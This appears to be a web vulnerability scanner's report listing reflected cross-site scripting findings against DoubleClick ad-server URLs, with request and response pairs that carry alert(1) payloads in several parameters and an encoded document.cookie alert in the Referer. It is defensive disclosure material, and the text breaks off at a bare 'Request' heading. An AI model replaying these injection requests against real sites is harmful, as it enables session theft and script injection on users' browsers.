document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=dfcbc"-alert(1)-"87f30d13fhttp%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallows ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db6b7'-alert(1)-'41e11d4dca9 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=db6b7'-alert(1)-'41e11d4dca9 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6046 Cache-Control: no-cache Pragma: no-cache Date: Mon, 07 Feb 2011 02:29:00 GMT Expires: Mon, 07 Feb 2011 02:29:00 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=db6b7'-alert(1)-'41e11d4dca9http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR\"> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 851cf'-alert(1)-'7daf788badb was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109851cf'-alert(1)-'7daf788badb&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:28:25 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6046
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... tp://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109851cf'-alert(1)-'7daf788badb&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR\"> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62064"-alert(1)-"db102385c04 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=6068503311614710962064"-alert(1)-"db102385c04&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:28:20 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6046
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... tp://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=6068503311614710962064"-alert(1)-"db102385c04&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR"); var fscUrl = url; var ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e376e'-alert(1)-'bf4060873d4 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84e376e'-alert(1)-'bf4060873d4&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:28:38 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5885
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... lick%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84e376e'-alert(1)-'bf4060873d4&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1\"> ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f221"-alert(1)-"1a47e7ddd0c was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=841f221"-alert(1)-"1a47e7ddd0c&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:28:34 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5885
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... lick%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=841f221"-alert(1)-"1a47e7ddd0c&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3696"-alert(1)-"456ec64c8fc was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657f3696"-alert(1)-"456ec64c8fc&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:28:25 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5885
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... click.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657f3696"-alert(1)-"456ec64c8fc&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; v ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18d99'-alert(1)-'38e55555851 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=10065718d99'-alert(1)-'38e55555851&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:28:30 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5885
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... click.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=10065718d99'-alert(1)-'38e55555851&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1\"> ...[SNIP]...
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8808b'-alert(1)-'f04a9d4c145 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a95612958808b'-alert(1)-'f04a9d4c145&redirect=;ord=71564039248027041? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:28:47 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5885
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... -0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a95612958808b'-alert(1)-'f04a9d4c145&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1\"> ...[SNIP]...
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f01bd"-alert(1)-"fee235b1bf2 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295f01bd"-alert(1)-"fee235b1bf2&redirect=;ord=71564039248027041? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:28:43 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5885
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... -0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295f01bd"-alert(1)-"fee235b1bf2&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6caa1"-alert(1)-"7a04f899c71 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=6caa1"-alert(1)-"7a04f899c71 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5855 Cache-Control: no-cache Pragma: no-cache Date: Mon, 07 Feb 2011 02:28:52 GMT Expires: Mon, 07 Feb 2011 02:28:52 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 1919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=6caa1"-alert(1)-"7a04f899c71https://www.maxclarity.com/tv/?uid=BN1_PSD1"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb0bf'-alert(1)-'66f3aad0857 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=bb0bf'-alert(1)-'66f3aad0857 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5855 Cache-Control: no-cache Pragma: no-cache Date: Mon, 07 Feb 2011 02:28:56 GMT Expires: Mon, 07 Feb 2011 02:28:56 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 1919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=bb0bf'-alert(1)-'66f3aad0857https://www.maxclarity.com/tv/?uid=BN1_PSD1\"> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90fb0"-alert(1)-"59611f3a704 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
